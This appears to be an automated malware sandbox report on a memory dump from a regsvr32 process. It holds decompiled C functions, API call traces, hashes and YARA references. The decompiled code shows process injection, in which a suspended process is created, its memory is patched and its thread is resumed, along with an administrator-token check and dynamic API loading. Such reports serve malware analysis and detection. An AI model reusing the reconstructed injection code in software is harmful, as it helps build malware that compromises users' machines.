                                                                                                                                                                        0x049ec834
                                                                                                                                                                        0x049ec834
                                                                                                                                                                        0x049ec834
                                                                                                                                                                        0x049ec832
                                                                                                                                                                        0x049ec861

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,049E0000,00000000,00000000,?,049EC876,00000000,00000000,?,049EC89F), ref: 049EC810
                                                                                                                                                                        • GetLastError.KERNEL32(?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC817
                                                                                                                                                                          • Part of subcall function 049E8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC846
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2499131667-0
                                                                                                                                                                        • Opcode ID: cc25cf95cf81aff1d65bfd213c13e13bbb1d3e6ed081c448dc6a6d37a6f0f62f
                                                                                                                                                                        • Instruction ID: 15058b312144e971d793f385e924d992ce09c0134919681cf046d30e294f557b
                                                                                                                                                                        • Opcode Fuzzy Hash: cc25cf95cf81aff1d65bfd213c13e13bbb1d3e6ed081c448dc6a6d37a6f0f62f
                                                                                                                                                                        • Instruction Fuzzy Hash: 700167B2700114BFAB259AA6DD48DBB7FBCEF456A07100579F905E6110E671FD01D7E0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EBC84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40processCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 225 49ebc84-49ebcd3 call 49e8d6d * 2 CreateProcessW
                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E049EBC84(WCHAR* __ecx, struct _PROCESS_INFORMATION* __edx) {
				struct _STARTUPINFOW _v72;
				signed int _t11;

				E049E8D6D(__edx, 0, 0x10);
				E049E8D6D( &_v72, 0, 0x44);
				_v72.cb = 0x44;
				_t11 = CreateProcessW(0, __ecx, 0, 0, 0, 4, 0, 0,  &_v72, __edx);
				asm("sbb eax, eax");
				return  ~( ~_t11) - 1;
			}





                                                                                                                                                                        0x049ebc95
                                                                                                                                                                        0x049ebca2
                                                                                                                                                                        0x049ebcaa
                                                                                                                                                                        0x049ebcc6
                                                                                                                                                                        0x049ebccc
                                                                                                                                                                        0x049ebcd3

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 049EBCC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateProcessmemset
                                                                                                                                                                        • String ID: D
                                                                                                                                                                        • API String ID: 2296119082-2746444292
                                                                                                                                                                        • Opcode ID: 752ee3358b60b0b9a9ad46002af9aac0bd0ae69a70c67eb3a0151aee607dd132
                                                                                                                                                                        • Instruction ID: a230f686e23fbcda2ce1f8b369d580994dde1fffbeabf085b2351671637c9296
                                                                                                                                                                        • Opcode Fuzzy Hash: 752ee3358b60b0b9a9ad46002af9aac0bd0ae69a70c67eb3a0151aee607dd132
                                                                                                                                                                        • Instruction Fuzzy Hash: 5EF065F16402087EF721E6A5DC0AFBF3AACCB81714F500135BB05EB1C0E6A4ED4582B5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049ED804 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 230 49ed804-49ed824 call 49ed6dc 233 49ed82a-49ed849 call 49eb557 230->233 234 49ed955-49ed958 230->234 237 49ed84f-49ed851 233->237 238 49ed945-49ed954 call 49e8bf4 233->238 240 49ed857-49ed859 237->240 241 49ed933-49ed943 call 49e8bf4 237->241 238->234 243 49ed85c-49ed85e 240->243 241->238 245 49ed864-49ed883 call 49e8d6d call 49ebc84 243->245 246 49ed921-49ed92d 243->246 252 49ed8e5-49ed8e9 245->252 253 49ed885-49ed898 call 49ed959 245->253 246->237 246->241 254 49ed8eb-49ed8ed 252->254 255 49ed914-49ed91b 252->255 253->252 260 49ed89a-49ed8b2 253->260 257 49ed8fe-49ed90e 254->257 258 49ed8ef-49ed8f5 254->258 255->243 255->246 257->255 258->257 263 49ed8b4-49ed8c9 GetLastError call 49eda57 260->263 264 49ed8e2 260->264 267 49ed8de-49ed8df FindCloseChangeNotification 263->267 268 49ed8cb-49ed8d6 263->268 264->252 267->264 270 49ed8d8 268->270 271 49ed8d9 268->271 270->271 271->267
                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                        			E049ED804(intOrPtr __edx) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v36;
				char _v40;
				char _v80;
				char _t37;
				intOrPtr _t38;
				signed int _t45;
				void* _t49;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t59;
				void* _t62;
				intOrPtr _t63;
				signed int _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t86;
				char _t87;
				void* _t88;

				_v16 = _v16 & 0x00000000;
				_v20 = __edx;
				_t86 = 0;
				_t37 = E049ED6DC( &_v16);
				_t87 = _t37;
				_v24 = _t87;
				_t89 = _t87;
				if(_t87 == 0) {
					return _t37;
				}
				_t38 =  *0x49ff81c; // 0x4befbe8
				_t7 = _t38 + 0xac; // 0x7fc38876
				E049EB557( &_v80,  *_t7 + 7, _t89);
				_v12 = _v12 & 0;
				_t67 = _v16;
				if(_t67 == 0) {
					L21:
					E049E8BF4( &_v24, 0);
					return _t86;
				}
				while(_t86 == 0) {
					_t69 = 0;
					_v8 = 0;
					while(_t86 == 0) {
						E049E8D6D( &_v40, _t86, 0x10);
						_t88 = _t88 + 0xc;
						_t49 = E049EBC84( *((intOrPtr*)(_t87 + _v12 * 4)),  &_v40); // executed
						_t94 = _t49;
						if(_t49 >= 0) {
							_t56 = E049ED959(E049E61C5,  &_v40, _t94, _v20); // executed
							if(_t56 != 0) {
								_t59 =  *0x49ff818; // 0x4bef8b0
								_t70 =  *((intOrPtr*)(_t59 + 0xd0))(0, 0, 0,  &_v80);
								if(_t70 != 0) {
									GetLastError();
									_t62 = E049EDA57( &_v40);
									_t63 =  *0x49ff818; // 0x4bef8b0
									if(_t62 != 0) {
										_push(0xea60);
										_push(_t70);
										if( *((intOrPtr*)(_t63 + 0x2c))() == 0) {
											_t86 = _t86 + 1;
										}
										_t63 =  *0x49ff818; // 0x4bef8b0
									}
									FindCloseChangeNotification(_t70);
								}
								_t69 = _v8;
							}
						}
						if(_v40 != 0) {
							if(_t86 == 0) {
								_t54 =  *0x49ff818; // 0x4bef8b0
								 *((intOrPtr*)(_t54 + 0x110))(_v40, _t86);
							}
							_t50 =  *0x49ff818; // 0x4bef8b0
							 *((intOrPtr*)(_t50 + 0x30))(_v36);
							_t52 =  *0x49ff818; // 0x4bef8b0
							 *((intOrPtr*)(_t52 + 0x30))(_v40);
						}
						_t69 = _t69 + 1;
						_v8 = _t69;
						if(_t69 < 2) {
							continue;
						} else {
							break;
						}
					}
					_t67 = _v16;
					_t45 = _v12 + 1;
					_v12 = _t45;
					if(_t45 < _t67) {
						continue;
					} else {
						break;
					}
					do {
						goto L20;
					} while (_t67 != 0);
					goto L21;
				}
				L20:
				E049E8BF4(_t87, 0xfffffffe);
				_t87 = _t87 + 4;
				_t67 = _t67 - 1;
			}




























                                                                                                                                                                        0x049ed80a
                                                                                                                                                                        0x049ed813
                                                                                                                                                                        0x049ed816
                                                                                                                                                                        0x049ed818
                                                                                                                                                                        0x049ed81d
                                                                                                                                                                        0x049ed81f
                                                                                                                                                                        0x049ed822
                                                                                                                                                                        0x049ed824
                                                                                                                                                                        0x049ed958
                                                                                                                                                                        0x049ed958
                                                                                                                                                                        0x049ed82a
                                                                                                                                                                        0x049ed833
                                                                                                                                                                        0x049ed83c
                                                                                                                                                                        0x049ed841
                                                                                                                                                                        0x049ed844
                                                                                                                                                                        0x049ed849
                                                                                                                                                                        0x049ed945
                                                                                                                                                                        0x049ed94b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed954
                                                                                                                                                                        0x049ed84f
                                                                                                                                                                        0x049ed857
                                                                                                                                                                        0x049ed859
                                                                                                                                                                        0x049ed85c
                                                                                                                                                                        0x049ed86b
                                                                                                                                                                        0x049ed876
                                                                                                                                                                        0x049ed87c
                                                                                                                                                                        0x049ed881
                                                                                                                                                                        0x049ed883
                                                                                                                                                                        0x049ed890
                                                                                                                                                                        0x049ed898
                                                                                                                                                                        0x049ed8a3
                                                                                                                                                                        0x049ed8ae
                                                                                                                                                                        0x049ed8b2
                                                                                                                                                                        0x049ed8b4
                                                                                                                                                                        0x049ed8bd
                                                                                                                                                                        0x049ed8c4
                                                                                                                                                                        0x049ed8c9
                                                                                                                                                                        0x049ed8cb
                                                                                                                                                                        0x049ed8d0
                                                                                                                                                                        0x049ed8d6
                                                                                                                                                                        0x049ed8d8
                                                                                                                                                                        0x049ed8d8
                                                                                                                                                                        0x049ed8d9
                                                                                                                                                                        0x049ed8d9
                                                                                                                                                                        0x049ed8df
                                                                                                                                                                        0x049ed8df
                                                                                                                                                                        0x049ed8e2
                                                                                                                                                                        0x049ed8e2
                                                                                                                                                                        0x049ed898
                                                                                                                                                                        0x049ed8e9
                                                                                                                                                                        0x049ed8ed
                                                                                                                                                                        0x049ed8ef
                                                                                                                                                                        0x049ed8f8
                                                                                                                                                                        0x049ed8f8
                                                                                                                                                                        0x049ed8fe
                                                                                                                                                                        0x049ed906
                                                                                                                                                                        0x049ed909
                                                                                                                                                                        0x049ed911
                                                                                                                                                                        0x049ed911
                                                                                                                                                                        0x049ed914
                                                                                                                                                                        0x049ed915
                                                                                                                                                                        0x049ed91b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed91b
                                                                                                                                                                        0x049ed924
                                                                                                                                                                        0x049ed927
                                                                                                                                                                        0x049ed928
                                                                                                                                                                        0x049ed92d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed933
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ed933
                                                                                                                                                                        0x049ed933
                                                                                                                                                                        0x049ed936
                                                                                                                                                                        0x049ed93c
                                                                                                                                                                        0x049ed940

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                          • Part of subcall function 049EBC84: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 049EBCC6
                                                                                                                                                                          • Part of subcall function 049ED959: GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 049ED9BB
                                                                                                                                                                          • Part of subcall function 049ED959: NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 049EDA04
                                                                                                                                                                          • Part of subcall function 049ED959: NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 049EDA21
                                                                                                                                                                          • Part of subcall function 049ED959: NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 049EDA42
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000001), ref: 049ED8B4
                                                                                                                                                                          • Part of subcall function 049EDA57: ResumeThread.KERNELBASE(?,049ED8C2,?,?,00000001), ref: 049EDA5F
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,00000001), ref: 049ED8DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryVirtual$ProtectThread$ChangeCloseContextCreateErrorFindLastNotificationProcessResumeWritememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2212882986-0
                                                                                                                                                                        • Opcode ID: e7c2e4670a2e8fafde50f9ac80ae4eb8ebea5e88acbe3bff22e1cb2aba159db4
                                                                                                                                                                        • Instruction ID: 2e44bbb6c1766a7c488fcd8b921eb4ad0f7ffaa1a610babf5ee9a452412289d9
                                                                                                                                                                        • Opcode Fuzzy Hash: e7c2e4670a2e8fafde50f9ac80ae4eb8ebea5e88acbe3bff22e1cb2aba159db4
                                                                                                                                                                        • Instruction Fuzzy Hash: A2414D71A0020AAFDB12DF9AD984EAD77FDFF88314F104275E915A7251DB30AE45CB60
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049E64EF Relevance: 3.1, APIs: 2, Instructions: 78threadCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                        			_entry_(void* __ecx, intOrPtr _a4, WCHAR* _a8) {
				long _v8;
				intOrPtr _t15;
				WCHAR* _t23;
				long _t24;
				void* _t28;
				void* _t31;
				intOrPtr _t36;
				void* _t41;
				void* _t48;
				intOrPtr* _t49;

				_push(__ecx);
				if(_a8 != 1) {
					__eflags = _a8;
					if(_a8 != 0) {
						L7:
						__eflags = 1;
						return 1;
					}
					_t15 =  *0x49ff818; // 0x4bef8b0
					 *((intOrPtr*)(_t15 + 0xb8))(0xaa);
					L3:
					return 0;
				}
				E049E8BC9();
				E049E9591();
				 *0x49ff830 = _a4;
				E049F3CD5(_a4);
				 *_t49 = 0xf43;
				 *0x49ff818 = E049EF05C(0x49fca50, 0x138);
				 *_t49 = 0x111;
				_t23 = E049E9DF2(0x49fca50);
				_pop(_t41);
				_a8 = _t23;
				_t24 = GetFileAttributesW(_t23); // executed
				_push( &_a8);
				if(_t24 == 0xffffffff) {
					E049E8BAF();
					 *_t49 = 0x40e;
					_t28 = E049E9CB5(E049E109A(_t41));
					_a8 = _t28;
					__eflags = _t28;
					if(_t28 != 0) {
						_t48 = 0x54;
						 *0x49ff828 = E049EF05C(0x49fcbb8, _t48);
						E049E6370(_t48, __eflags);
						E049E8BF4( &_a8, 0xfffffffe);
						_t36 =  *0x49ff818; // 0x4bef8b0
						 *((intOrPtr*)(_t36 + 0xe8))(1, 0x39c);
					}
					_v8 = 0;
					_t31 = CreateThread(0, 0, E049E6298, 0, 0,  &_v8);
					 *0x49ff83c = _t31;
					__eflags = _t31;
					if(_t31 == 0) {
						goto L3;
					} else {
						goto L7;
					}
				}
				E049E8BAF();
				goto L3;
			}













                                                                                                                                                                        0x049e64f2
                                                                                                                                                                        0x049e64f7
                                                                                                                                                                        0x049e65db
                                                                                                                                                                        0x049e65df
                                                                                                                                                                        0x049e65d4
                                                                                                                                                                        0x049e65d6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e65d6
                                                                                                                                                                        0x049e65e1
                                                                                                                                                                        0x049e65eb
                                                                                                                                                                        0x049e6556
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e6556
                                                                                                                                                                        0x049e64fd
                                                                                                                                                                        0x049e6502
                                                                                                                                                                        0x049e650b
                                                                                                                                                                        0x049e6510
                                                                                                                                                                        0x049e651a
                                                                                                                                                                        0x049e652b
                                                                                                                                                                        0x049e6530
                                                                                                                                                                        0x049e6537
                                                                                                                                                                        0x049e653c
                                                                                                                                                                        0x049e653e
                                                                                                                                                                        0x049e6541
                                                                                                                                                                        0x049e654d
                                                                                                                                                                        0x049e654e
                                                                                                                                                                        0x049e655a
                                                                                                                                                                        0x049e655f
                                                                                                                                                                        0x049e656e
                                                                                                                                                                        0x049e6573
                                                                                                                                                                        0x049e6576
                                                                                                                                                                        0x049e6578
                                                                                                                                                                        0x049e6581
                                                                                                                                                                        0x049e658c
                                                                                                                                                                        0x049e6591
                                                                                                                                                                        0x049e659c
                                                                                                                                                                        0x049e65a1
                                                                                                                                                                        0x049e65ab
                                                                                                                                                                        0x049e65ab
                                                                                                                                                                        0x049e65c5
                                                                                                                                                                        0x049e65c8
                                                                                                                                                                        0x049e65cb
                                                                                                                                                                        0x049e65d0
                                                                                                                                                                        0x049e65d2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e65d2
                                                                                                                                                                        0x049e6550
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049E8BC9: HeapCreate.KERNELBASE(00000000,00096000,00000000,049E6502), ref: 049E8BD2
                                                                                                                                                                          • Part of subcall function 049EF05C: GetModuleHandleA.KERNEL32(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF07E
                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 049E6541
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,049E6298,00000000,00000000,?), ref: 049E65C8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$AttributesFileHandleHeapModuleThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 607385197-0
                                                                                                                                                                        • Opcode ID: 6821116c3ef122fb5c173cdcb4336c69c2ac400e6b534d7ec5a1c00081c7c202
                                                                                                                                                                        • Instruction ID: e1e363ab7b678cf5a4b4373bde5a8035b1cbc3f3d1dc4e5311780666b7ac5af6
                                                                                                                                                                        • Opcode Fuzzy Hash: 6821116c3ef122fb5c173cdcb4336c69c2ac400e6b534d7ec5a1c00081c7c202
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D2144B1614204AFEB05BF76D805A793BE8EB54314F40853AE51ADA184DF78F940CB55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EF05C Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 308 49ef05c-49ef07c call 49e9dd8 311 49ef07e-49ef084 GetModuleHandleA 308->311 312 49ef086-49ef08b LoadLibraryA 308->312 313 49ef08d-49ef08f 311->313 312->313 314 49ef09e-49ef0ac call 49e8b9c 313->314 315 49ef091-49ef096 call 49ef011 313->315 318 49ef09b-49ef09c 315->318 318->314
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049EF05C(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E049E9DD8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0xf43) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E049EF011(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E049E8B9C( &_v8);
				return _t25;
			}










                                                                                                                                                                        0x049ef05f
                                                                                                                                                                        0x049ef062
                                                                                                                                                                        0x049ef068
                                                                                                                                                                        0x049ef06a
                                                                                                                                                                        0x049ef06f
                                                                                                                                                                        0x049ef071
                                                                                                                                                                        0x049ef07b
                                                                                                                                                                        0x049ef07c
                                                                                                                                                                        0x049ef08b
                                                                                                                                                                        0x049ef07e
                                                                                                                                                                        0x049ef07e
                                                                                                                                                                        0x049ef07e
                                                                                                                                                                        0x049ef08f
                                                                                                                                                                        0x049ef096
                                                                                                                                                                        0x049ef09c
                                                                                                                                                                        0x049ef09c
                                                                                                                                                                        0x049ef0a1
                                                                                                                                                                        0x049ef0ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF07E
                                                                                                                                                                        • LoadLibraryA.KERNELBASE(00000000,?,?,?,049FCA50,?,049E652B,?), ref: 049EF08B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleLibraryLoadModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4133054770-0
                                                                                                                                                                        • Opcode ID: f78a8133417cb12d36f9d230e9ff9f1268a24ae39ca6e928822ab55d2b7ab95f
                                                                                                                                                                        • Instruction ID: 3bfea701f091498c6d5546a8b4407d237c5543c504ffa6fc8474c386803f7a0b
                                                                                                                                                                        • Opcode Fuzzy Hash: f78a8133417cb12d36f9d230e9ff9f1268a24ae39ca6e928822ab55d2b7ab95f
                                                                                                                                                                        • Instruction Fuzzy Hash: C1F0A771304214BBD715AFAAE8448BAB7EDDFC8355714417BF606D3154EAB0EE4086A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 049EC8C9 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 320 49ec8c9-49ec8e8 call 49ec79e 323 49ec8ee-49ec905 call 49ec7f5 320->323 324 49ec983-49ec986 320->324 327 49ec907-49ec928 323->327 328 49ec965-49ec973 FindCloseChangeNotification 323->328 327->328 334 49ec92a-49ec92c 327->334 329 49ec975-49ec980 call 49e8bf4 328->329 330 49ec981 328->330 329->330 330->324 335 49ec92e-49ec931 334->335 336 49ec958-49ec963 334->336 337 49ec934-49ec943 335->337 336->328 340 49ec955-49ec957 337->340 341 49ec945-49ec951 337->341 340->336 341->337 342 49ec953 341->342 342->336
                                                                                                                                                                        C-Code - Quality: 47%
                                                                                                                                                                        			E049EC8C9(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E049EC79E(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E049EC7F5(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E049E8BF4( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x49ff820; // 0x4befaa0
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x49ff820; // 0x4befaa0
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x49ff820; // 0x4befaa0
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}




















                                                                                                                                                                        0x049ec8d0
                                                                                                                                                                        0x049ec8d2
                                                                                                                                                                        0x049ec8d9
                                                                                                                                                                        0x049ec8db
                                                                                                                                                                        0x049ec8de
                                                                                                                                                                        0x049ec8e3
                                                                                                                                                                        0x049ec8e8
                                                                                                                                                                        0x049ec8f2
                                                                                                                                                                        0x049ec8f5
                                                                                                                                                                        0x049ec8f8
                                                                                                                                                                        0x049ec8fd
                                                                                                                                                                        0x049ec8ff
                                                                                                                                                                        0x049ec905
                                                                                                                                                                        0x049ec965
                                                                                                                                                                        0x049ec96d
                                                                                                                                                                        0x049ec973
                                                                                                                                                                        0x049ec97a
                                                                                                                                                                        0x049ec980
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec981
                                                                                                                                                                        0x049ec90a
                                                                                                                                                                        0x049ec90b
                                                                                                                                                                        0x049ec90c
                                                                                                                                                                        0x049ec90d
                                                                                                                                                                        0x049ec90e
                                                                                                                                                                        0x049ec90f
                                                                                                                                                                        0x049ec910
                                                                                                                                                                        0x049ec911
                                                                                                                                                                        0x049ec916
                                                                                                                                                                        0x049ec918
                                                                                                                                                                        0x049ec91d
                                                                                                                                                                        0x049ec91e
                                                                                                                                                                        0x049ec928
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec92c
                                                                                                                                                                        0x049ec958
                                                                                                                                                                        0x049ec958
                                                                                                                                                                        0x049ec960
                                                                                                                                                                        0x049ec963
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec963
                                                                                                                                                                        0x049ec92e
                                                                                                                                                                        0x049ec92e
                                                                                                                                                                        0x049ec931
                                                                                                                                                                        0x049ec934
                                                                                                                                                                        0x049ec934
                                                                                                                                                                        0x049ec937
                                                                                                                                                                        0x049ec939
                                                                                                                                                                        0x049ec943
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec948
                                                                                                                                                                        0x049ec949
                                                                                                                                                                        0x049ec94c
                                                                                                                                                                        0x049ec951
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec953
                                                                                                                                                                        0x049ec957
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049ec957
                                                                                                                                                                        0x049ec986

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 049EC79E: GetCurrentThread.KERNEL32 ref: 049EC7B1
                                                                                                                                                                          • Part of subcall function 049EC79E: OpenThreadToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7B8
                                                                                                                                                                          • Part of subcall function 049EC79E: GetLastError.KERNEL32(?,?,049EC8E3,00000000,049E0000), ref: 049EC7BF
                                                                                                                                                                          • Part of subcall function 049EC79E: OpenProcessToken.ADVAPI32(00000000,?,?,049EC8E3,00000000,049E0000), ref: 049EC7E4
                                                                                                                                                                          • Part of subcall function 049EC7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,049E0000,00000000,00000000,?,049EC876,00000000,00000000,?,049EC89F), ref: 049EC810
                                                                                                                                                                          • Part of subcall function 049EC7F5: GetLastError.KERNEL32(?,049EC876,00000000,00000000,?,049EC89F,00001644,?,049EDFCE), ref: 049EC817
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,049E0000), ref: 049EC96D
                                                                                                                                                                        Memory Dump Source
